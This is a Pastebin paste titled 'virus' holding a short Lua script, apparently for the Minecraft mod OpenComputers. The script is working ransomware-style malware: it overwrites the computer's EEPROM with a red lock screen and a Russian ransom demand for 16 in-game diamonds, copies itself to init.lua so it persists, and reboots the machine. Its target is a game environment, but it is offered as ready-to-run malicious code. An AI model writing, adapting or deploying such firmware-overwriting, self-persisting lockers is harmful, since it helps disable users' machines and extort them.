Advertisement
Guest User

virus

a guest
Oct 19th, 2019
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.66 KB | None | 0 0
  1. component = require('component')
  2. eeprom = component.proxy(component.list('eeprom')())
  3. fs = require('filesystem')
  4.  
  5. eeprom.set("gpu = component.proxy(component.list('gpu')()) local w, h = gpu.getResolution() gpu.setBackground(0xFF0000) gpu.setForeground(0xFFFFFF) gpu.fill(1,1,w,h,' ') gpu.set(w/2-21/2,h/2,'Ваш компьютер заражён') gpu.set(w/2-44/2,h/2+1,'Для того что-бы получить назад свой компютер') gpu.set(w/2-40/2,h/2+2,'Вы должны отдать 16 алмазов Triggered,у') while true do computer.pullSignal(1) end")
  6. fs.copy('./virus','./init.lua')
  7.  
  8. computer = require('computer')
  9. computer.shutdown(true)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement